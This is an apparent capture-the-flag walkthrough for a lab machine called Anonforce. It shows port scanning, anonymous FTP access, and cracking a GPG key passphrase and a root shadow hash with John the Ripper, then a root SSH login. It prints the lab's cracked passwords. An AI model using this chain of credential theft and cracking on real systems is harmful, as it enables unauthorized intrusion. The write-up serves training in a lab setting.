Anonforce

Phase 1: Reconnaissance (Information Gathering)

export TARGET_IP=10.10.178.7
nmap -p- --min-rate 5000 $TARGET_IP

Not shown: 65392 closed tcp ports (reset), 141 filtered tcp ports (no-response)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh

Phase 2: Enumeration and Vulnerability Analysis

Based on the reconnaissance, we focus on the open services to identify potential vulnerabilities.

1. FTP Enumeration:

   • Command: ftp 10.10.178.7 21

   • Explanation: Attempts to connect to the FTP server on the target.

   • Interaction and Results (Annotated):

     # Connected to 10.10.178.7.
     # 220 (vsFTPd 3.0.3)  <--  Banner reveals the FTP server software and version.
     Name (10.10.178.7:kali): anonymous # Attempting anonymous login.
     # 331 Please specify the password.
     Password: # BLANK  <--  Entering a blank password.
     # 230 Login successful.  <--  Anonymous login is permitted! This is a major vulnerability.
     # Remote system type is UNIX.
     # Using binary mode to transfer files.
     ftp> help # Displays available FTP commands.
     ftp> ls # Lists files in the current directory.
     ftp> cd /home/melodias # Navigates to user "melodias" home directory.
     ftp> get user.txt  # Downloads a file named "user.txt".
     ftp> cd /notread # Navigates to the directory named "notread".
     ftp> ls  # Lists files

     -rwxrwxrwx    1 1000     1000          524 Aug 11  2019 backup.pgp
     -rwxrwxrwx    1 1000     1000         3762 Aug 11  2019 private.asc

   • Analysis:

     • Anonymous FTP Access: The most critical finding is that anonymous FTP access is enabled, allowing anyone to connect and browse (and potentially modify) files.
     • Sensitive Files: The backup.pgp and private.asc files are discovered. The .pgp extension suggests an encrypted file (likely using PGP or GPG), and the .asc extension often indicates an ASCII-armored key file (likely a private key). The file permissions (-rwxrwxrwx) are overly permissive, allowing any user (including the anonymous FTP user) to read, write, and execute these files. This is another significant security flaw.

Phase 3: Exploitation

Decrypting the Backup:

• Strategy: We have an encrypted file (backup.pgp) and what appears to be a private key (private.asc). We'll attempt to decrypt the backup using the private key.

• Steps (Annotated):

  gpg --import private.asc  # Imports the private key into the GPG keyring.
                            # GPG will prompt for a passphrase if the key is protected.
  • Passphrase Cracking: Often, private keys are protected with a passphrase. If the import fails or prompts for a password, we need to crack it.

  gpg2john private.asc > hash  # Extracts the password hash from the private key file.
                               # `gpg2john` is a tool from the John the Ripper suite.
  john hash --wordlist=/usr/share/wordlists/rockyou.txt  # Attempts to crack the hash.
  # Output: xbox360 (This indicates the cracked passphrase)
  
  gpg --import private.asc  # Re-import the key, this time providing the passphrase.
                            # Enter "xbox360" when prompted.
  gpg --decrypt backup.pgp  # Attempts to decrypt the backup.pgp file.
                            # Enter "xbox360" again when prompted.

2. Gaining Root Access:

   • backup.pgp is a /etc/shadow file.

   • Steps:

     # backup.pgp, once decrypted, will contain the shadow hash for root.
     echo -e 'root:$6$07nYFaYf$F4VMaegmz7dKjsTukBLh6cP01iMmL7CiQDt1ycIm6a.bsOIBp0DwXVb9XI2EtULXJzBtaMZMNd2tV4uob5RVM0:18120:0:99999:7:::' > roothash
     # Create new file called roothash.
     
     john roothash --wordlist=/usr/share/wordlists/rockyou.txt  # Attempt to crack the root password hash.
                                                                # Output: hikari (This indicates the cracked password)
     ssh root@$TARGET_IP  # Connect to the target as root via SSH.
                             # Enter "hikari" as the password.
     id  # Verify root access. Output should be: uid=0(root) gid=0(root) groups=0(root)